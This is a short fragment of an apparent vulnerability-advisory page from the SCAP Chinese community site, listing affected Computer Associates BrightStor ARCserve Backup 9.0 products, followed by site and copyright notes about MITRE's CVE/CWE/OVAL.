Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 9.0 1

Computer Associates BrightStor ARCserve Backup Agent for Exchange 9.0 1

Computer Associates BrightStor ARCserve Backup Agent for SQL 9.0 .0.1

Computer Associates BrightStor ARCserve Backup for Oracle 9.0 1

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站